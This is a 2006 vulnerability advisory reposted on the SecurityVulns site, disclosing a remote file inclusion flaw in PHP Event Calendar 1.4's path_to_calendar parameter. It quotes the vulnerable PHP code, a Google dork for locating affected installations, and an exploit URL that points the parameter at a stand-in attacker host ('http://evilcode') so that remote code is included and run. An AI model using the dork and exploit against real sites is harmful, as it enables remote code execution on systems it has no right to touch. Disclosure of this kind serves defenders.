Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

  [KurdishVanilla CMS <= 1.0.1 (RootDirectory)
Remote file inclusion Vuln.]

  [Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla]

  DotClear : Multiples Full Path Disclosure

From:chris_hasibuan_(at)_yahoo.com <chris_hasibuan_(at)_yahoo.com>
Date:24 июля 2006 г.
Subject:PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

#############################SolpotCrew Community################################
#
#        PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
#
#        Vendor site : http://www.softcomplex.com/products/php_event_calendar/
#
#################################################################################

#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)
#
#       contact: [email protected]
#
#       Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt
#
################################################################################

#
#
#      Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja ,
#              L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Anggands , Rendy , cow_1seng
#              and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "path_to_calendar" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from calendar.php

if(!$path_to_calendar){
       $path_to_calendar = $_path_to_calendar;
}
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
       global $db,$path_to_data,$settings;

Google dork : inurl:/cl_files/

exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode


##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород